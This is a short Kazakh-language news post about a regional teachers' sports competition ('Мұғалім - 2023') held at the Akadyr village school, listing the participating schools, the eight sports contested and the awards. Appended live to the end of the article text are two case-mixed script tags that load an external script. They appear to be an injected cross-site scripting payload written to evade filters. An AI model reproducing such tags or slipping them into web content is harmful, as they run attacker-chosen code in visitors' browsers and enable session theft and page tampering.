Мамыр айының 11-і күні Ақадыр ауылының жалпыорта білім беретін мектебінде кезекті "Мұғалім - 2023" аймақтық спартакиадасы өтті. Спартакиадаға 7 мектеп, яғни олар, Шағалалы ауылының жалпыорта білім беретін мектебі, Садовое ауылының жалпыорта білім беретін мектебі, Приречен ауылының жалпыорта білім беретін мектебі, Елікті ауылының жалпыорта білім беретін мектебі, Ескенежал негізгі білім беретін мектебі, Заречное негізгі білім беретін мектебі қатысты. Бұл кездесуде 8 спорт түрінен жарыс өтті. Олар: волейбол, теннис, шахмат, көпсайыс, тоғызқұмалақ, асық ату, бес асық, қалашық спорт ойындары. Бұл спартакиада қорытындысы бойынша 1,2,3 орындар иеленген спортшылар мақтау қағазымен марапатталды.1 орын иеленген спортшылар спартакиаданың аудандық кезеңге жолдама алды. Мұғалімдер биік белестерінен көріне берсін!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

15.05.2023

Просмотров: 1681


Пікір қосу



Деректерді қолтаңбаға қосу